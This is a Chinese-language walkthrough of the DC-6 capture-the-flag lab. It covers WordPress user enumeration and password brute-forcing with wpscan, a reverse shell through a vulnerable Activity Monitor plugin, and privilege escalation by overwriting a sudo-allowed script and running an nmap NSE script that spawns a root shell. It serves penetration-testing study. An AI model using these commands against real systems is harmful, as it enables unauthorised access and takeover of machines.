入门系列第三弹DC-6
基本信息
下载地址:DC-6
靶机:vmware,192.168.172.138
攻击机:kali2
Flag:1个
渗透过程
0x01 nmap扫描
扫描一下,只有22和80开放,然后注意一下作者告诉我们配置一下host了,记得改成wordy。
0x02 漏洞发现
访问wordy后,发现还是和之前的dc-2一个界面啊,估计又是wp吧。
访问一下/wp-admin成功之后,确认就是wp了,wpscan一样先扫一手用户名。然后保存一下,准备爆破。
wpscan --url http://wordy/ -e u
这个时候如果直接用字典的话,可能会浪费很多时间。记得看一看作者写的信息。
可以看见作者给了我们一条命令用来生成字典。
Clue
OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. 😉
开始跑账户密码。找到了mark的密码。
wpscan --url http://wordy/ -e --usernames username.txt -P password.txt
进入后台后看一看,最开始直接扫描的时候是没看见有什么插件的。进来后看见使用了Activity monitor插件,搜索一下看看有没有可以使用的漏洞。发现了三个,使用第三个页面。
0x03 漏洞利用
首先看一下EXP,将其中的利用部分url改为wordy,将nc反弹命令修改一下。
然后生成html页面,点击界面中的按钮,并监听对应端口。经典操作反弹交互shell。
0x04 水平越权
我们是有mark用户的,那不如先去/home看看,发现stuff,看一看,发现things-to-do.txt。发现有一个账户密码。
su看一下这个账户有什么。发现有一个不需要密码执行的文件。
看一下什么内容。发现是一个打包命令。既然是可执行的,那么就直接写命令反弹jens的shell。
如下执行命令。
cat /dev/null > /home/jens/backups.sh #清除源文件内容
vi /home/jens/backups.sh
i #输入模式
/bin/bash #切换jens的shell
ESC #进入命令模式
:wq #保存退出
然后我们执行命令。成功切换到jens。
sudo -u jens /home/jens/backups.sh
看一下可使用的命令,发现可以无密码使用nmap命令。
我们知道nmap是存在很多.nse的脚本的,直接在当前目录下写一个脚本,反弹root的shell。
echo "os.execute('/bin/bash')" > root.nse
sudo nmap --script root.nse
0x05 Get Flag
搞定。
总结
DC-6以WordPress的插件Activity monitor漏洞利用和水平越权为渗透的关键利用。有不会的命令和工具时一定要多用help和man,切忌直接百度~继续加油~